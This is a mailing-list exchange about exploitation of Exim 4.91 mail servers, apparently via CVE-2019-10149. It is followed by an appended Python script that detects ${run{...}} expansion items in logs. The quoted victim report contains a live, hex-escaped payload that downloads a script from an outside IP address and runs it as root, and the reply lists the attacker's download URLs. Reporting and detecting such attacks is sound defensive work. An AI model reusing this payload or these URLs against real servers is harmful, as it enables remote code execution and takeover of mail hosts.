Hi Calum,

Similarly, one of my honeypot VMs running exposed Exim 4.91 was attacked yesterday by similar means. The attacker, in my case, tried to download and execute one of the below (I excluded the scheme prefix from the links):

an7kmd2wp4xo7hpr dot tor2web dot su/src/ldm
an7kmd2wp4xo7hpr dot tor2web dot io/src/ldm
an7kmd2wp4xo7hpr dot onion dot sh/src/ldm

The script (ldm) itself is quite non-professional and buggy - the VM wasn't available via SSH, thus the attack only resulted in copying the would-be hacker's RSA key to root's authorized keys and inserting cron tasks to re-attempt the above.

I don't know where to report such things. To malware/antivirus manufacturers, perhaps? But the proper question is, IMHO, "why haven't I hardened my Exim installations while I could".

Sincerely,
Konstantin

Calum Mackay via Exim-users wrote on 2019-06-11 07:10:
> hi all,
>
> My mail system has just been hacked; it's running Debian unstable exim
> 4.91-9
>
> Could it be CVE-2019-10149? I don't see any reports of active exploits
> yet.
>
> The reasons I suspect exim involvement:
>
> • starting today, every 5 mins getting frozen messages:
>
> The following address(es) have yet to be delivered:
>
> root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldm1ip\x20\x2dO\x20\x2froot\x2f\x2efabyfmnp\x20\x26\x26\x20sh\x20\x2froot\x2f\x2efabyfmnp\x20\x2dn\x22\x20\x26}}@xxx:
> Too many "Received" headers - suspected mail loop
>
> • the trojan horse scripts, that were successfully installed on my
> system, with root access, are all group Debian-exim
>
> Luckily, it looks like the trojans did nothing more than repeated
> attempts to open up my ssh server to root logins, which I think (and
> hope) didn't actually work, so I may have been lucky, and the damage
> isn't widespread.
>
> ought I to be reporting this anywhere?
>
> thanks,
> calum.

--
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/
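The tell-tale symptom in both reports is a recipient local part carrying an Exim `${run{...}}` expansion item whose command is hex-escaped (`\xNN`). The following is an added detection example, not code from either poster or from the Exim project: it scans constructed log-style lines for `${run{...}}` items and decodes the escapes so an operator can read what a frozen message was trying to expand. The sample lines and the harmless `echo` command in them are constructed for this example.

```python
import re

# Constructed sample lines in the style of an Exim frozen-message notice.
# The second line carries a ${run{...}} item with a hex-escaped command;
# the command here is a harmless echo, not anything seen in the wild.
SAMPLE_LINES = [
    "2019-06-11 07:10:02 1hZzzz-0001aa-Bb Frozen",
    "root+${run{\\x2fbin\\x2fsh\\x20\\x2dc\\x20\\x22echo\\x20hi\\x22}}@example.invalid: "
    "Too many \"Received\" headers - suspected mail loop",
    "postmaster@example.invalid: normal delivery",
]

# An expansion item of the form ${run{<command>}}; non-greedy so one line
# with several items yields several matches.
RUN_ITEM = re.compile(r"\$\{run\{(?P<body>.*?)\}\}")
# The \xNN escape form Exim accepts inside expansion strings.
HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")


def unescape_hex(s):
    """Replace each \\xNN escape with the character it encodes."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), s)


def find_run_expansions(line):
    """Return the decoded command of every ${run{...}} item on the line."""
    return [unescape_hex(m.group("body")) for m in RUN_ITEM.finditer(line)]


def scan(lines):
    """Return (line, decoded_commands) for every line that contains a
    ${run{...}} item; a legitimate recipient address never carries one."""
    hits = []
    for line in lines:
        cmds = find_run_expansions(line)
        if cmds:
            hits.append((line, cmds))
    return hits


if __name__ == "__main__":
    for line, cmds in scan(SAMPLE_LINES):
        print("suspicious expansion item:", cmds, "in:", line)
```

Run it over `mainlog`, `paniclog` or the output of `exim -bp` on a host that shows frozen messages like the one quoted above; any hit is worth treating as an attempted expansion, whether or not the command ever executed.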